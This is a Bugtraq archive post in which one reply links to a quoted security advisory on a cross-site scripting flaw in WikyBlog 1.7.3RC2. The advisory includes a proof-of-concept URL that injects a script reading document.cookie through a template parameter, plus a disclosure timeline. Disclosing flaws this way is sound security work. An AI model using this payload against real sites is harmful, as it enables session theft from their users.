Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: WikyBlog 1.7.3RC2 XSS vulnerability

From: Henri Salo <henri () nerv fi>
Date: Sun, 18 Mar 2012 11:50:05 +0200
This seems to be same issue as http://secunia.com/advisories/38699/ / http://osvdb.org/show/osvdb/62558

I created item about this case to their sf issue tracker: 
https://sourceforge.net/tracker/?func=detail&aid=3507681&group_id=148518&atid=771904

- Henri Salo

On Thu, Mar 15, 2012 at 05:31:41PM +0000, sschurtz () darksecurity de wrote:

Advisory:             WikyBlog 1.7.3RC2 XSS vulnerability
Advisory ID:          SSCHADV2012-006
Author:                       Stefan Schurtz
Affected Software:    Successfully tested on WikyBlog 1.7.3RC2
Vendor URL:           http://www.wikyblog.com/
Vendor Status:                informed

==========================
Vulnerability Description
==========================

WikyBlog 1.7.3RC2 is prone to a XSS vulnerability

==================
PoC-Exploit
==================

http://[target]/WikyBlog-1.7.3rc2/index.php/Special/Main/Templates?cmd=copy&which='";<script>alert(document.cookie)</script>

=========
Solution
=========

-

====================
Disclosure Timeline
====================

25-Feb-2012 - vendor informed
15-Mar-2012 - no response from vendor

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-006.txt
Previous By Date Next
Previous By Thread Next

Current thread: